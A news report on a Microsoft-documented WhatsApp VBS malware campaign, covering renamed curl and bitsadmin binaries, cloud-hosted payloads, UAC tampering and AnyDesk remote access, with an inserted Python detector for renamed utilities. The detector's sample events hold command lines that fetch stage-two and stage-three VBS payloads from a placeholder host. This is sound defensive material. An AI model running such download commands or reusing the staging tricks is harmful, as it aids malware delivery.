Microsoft has called attention to a new campaign that leverages WhatsApp messages to distribute malicious Visual Basic Script (VBS) files.
The activity began in late February 2026. The scripts initiate a multi-stage infection chain, establish persistence, and enable remote access. Researchers still do not know what lures the threat actors use to trick users into executing the scripts.
“The campaign relies on a combination of social engineering and living-off-the-land techniques,” the Microsoft Defender Security Research Team said. “It uses renamed Windows utilities to blend into normal system activity, retrieves payloads from trusted cloud services such as AWS, Tencent Cloud, and Backblaze B2, and installs malicious Microsoft Installer (MSI) packages to maintain control of the system.”
Attackers Blend Legitimate Tools with Malicious Activity
Combining legitimate Windows tools with trusted cloud platforms makes the activity hard to distinguish from normal network traffic, which significantly raises the attackers' success rate.
Specifically, the activity begins when attackers distribute malicious VBS files via WhatsApp messages. Once executed, these files create hidden folders in C:\ProgramData and drop renamed versions of legitimate Windows utilities such as “curl.exe” (renamed as “netapi.dll”) and “bitsadmin.exe” (renamed as “sc.exe”).
After gaining an initial foothold, attackers move quickly to establish persistence and escalate privileges, ultimately installing malicious MSI packages on victim systems. To achieve this, they download auxiliary VBS files hosted on AWS S3, Tencent Cloud, and Backblaze B2 using the renamed binaries.
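The rename trick described above (curl.exe running as "netapi.dll", bitsadmin.exe running as "sc.exe") leaves a clear signal in process-creation telemetry: renaming a file on disk does not change the OriginalFileName stored in the PE's version resource, which Sysmon Event ID 1 records alongside the on-disk Image path. The following detection sketch is an added example, not code from Microsoft or the article; it runs over constructed key=value renderings of such events (the field names are real Sysmon fields, the flat format and sample values are assumptions made for this example) and flags two things: a binary whose on-disk name differs from its compiled-in name, and a script host (wscript.exe/cscript.exe) launching a binary out of C:\ProgramData.

```python
"""Flag renamed Windows utilities and script-spawned ProgramData binaries in
process-creation records. All sample events below are constructed for this
example; the key=value layout is a simplification of Sysmon Event ID 1."""
import re
from pathlib import PureWindowsPath

# Download-capable built-ins named in the article (curl, bitsadmin) plus certutil,
# a commonly abused peer. Matching keys on OriginalFileName, which survives a rename.
DOWNLOAD_UTILITIES = {"curl.exe", "bitsadmin.exe", "certutil.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DROP_ROOT = "c:\\programdata\\"

# Constructed sample: lines 2 and 3 mimic the renamed binaries; 1 and 4 are benign.
SAMPLE_EVENTS = """\
Image=C:\\Windows\\System32\\curl.exe OriginalFileName=curl.exe ParentImage=C:\\Windows\\System32\\cmd.exe CommandLine="curl.exe -o report.pdf https://example.invalid/report.pdf"
Image=C:\\ProgramData\\.cache\\netapi.dll OriginalFileName=curl.exe ParentImage=C:\\Windows\\System32\\wscript.exe CommandLine="netapi.dll -s -o C:\\ProgramData\\.cache\\stage2.vbs https://bucket.example.invalid/stage2.vbs"
Image=C:\\ProgramData\\.cache\\sc.exe OriginalFileName=bitsadmin.exe ParentImage=C:\\Windows\\System32\\wscript.exe CommandLine="sc.exe /transfer job /download /priority high https://bucket.example.invalid/stage3.vbs C:\\ProgramData\\.cache\\stage3.vbs"
Image=C:\\Windows\\System32\\sc.exe OriginalFileName=sc.exe ParentImage=C:\\Windows\\System32\\services.exe CommandLine="sc.exe query wuauserv"
"""

# key=value pairs; a value is either a double-quoted string or a run of non-spaces.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Parse one key=value record into a dict; quoted values lose their quotes."""
    return {key: value.strip('"') for key, value in FIELD_RE.findall(line)}


def analyze_event(event):
    """Return a list of (rule, detail) findings for one process-creation event."""
    findings = []
    image = event.get("Image", "")
    image_name = PureWindowsPath(image).name.lower()
    original = event.get("OriginalFileName", "").lower()
    parent_name = PureWindowsPath(event.get("ParentImage", "")).name.lower()

    # Rule 1: the on-disk name differs from the name compiled into the PE.
    # A renamed downloader (curl, bitsadmin, certutil) is rated high.
    if original and original != image_name:
        severity = "high" if original in DOWNLOAD_UTILITIES else "medium"
        findings.append((f"renamed-utility:{severity}",
                         f"{image_name} is really {original}"))

    # Rule 2: a script host launched a binary that lives under C:\ProgramData.
    # The hidden attribute itself is not visible in process logs, so the drop
    # location plus the wscript/cscript parent stands in for it.
    if parent_name in SCRIPT_HOSTS and image.lower().startswith(DROP_ROOT):
        findings.append(("script-host-spawn-programdata",
                         f"{parent_name} -> {image}"))
    return findings


def scan(log_text):
    """Run every rule over every non-empty line; returns [(line_no, rule, detail)]."""
    results = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        for rule, detail in analyze_event(parse_event(line)):
            results.append((line_no, rule, detail))
    return results


if __name__ == "__main__":
    for line_no, rule, detail in scan(SAMPLE_EVENTS):
        print(f"line {line_no}: {rule}: {detail}")
```

Run against the constructed sample, lines 2 and 3 each produce both findings while the genuine curl.exe and sc.exe invocations on lines 1 and 4 produce none. In production the same two rules translate directly into an EDR or SIEM query on the Image, OriginalFileName and ParentImage fields; the OriginalFileName comparison is the more robust of the two, since it does not depend on where the attacker chooses to stage files.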
“Once the secondary payloads are in place, the malware begins tampering with User Account Control (UAC) settings to weaken system defenses,” Redmond said. “It continuously attempts to launch cmd.exe with elevated privileges, retrying until UAC elevation succeeds or the process is forcibly terminated, modifying registry entries under HKLM\Software\Microsoft\Win, and embedding persistence mechanisms to ensure the infection survives system reboots.”
UAC Bypass and Remote Access Strengthen the Attack Chain
Consequently, these actions allow the threat actors to gain elevated privileges without user interaction by combining registry manipulation with UAC bypass techniques. In the final stage, they deploy unsigned MSI installers, including legitimate tools like AnyDesk, which provide persistent remote access.
Through this access, attackers can exfiltrate data or deploy additional malware, further compromising the system.
Ultimately, this campaign highlights a sophisticated approach that blends social engineering (WhatsApp delivery), stealth techniques (renamed legitimate tools and hidden attributes), and cloud-based payload hosting.
“This campaign demonstrates a sophisticated infection chain combining social engineering (WhatsApp delivery), stealth techniques (renamed legitimate tools, hidden attributes), and cloud-based payload hosting,” Microsoft said.
Source: TheHackerNews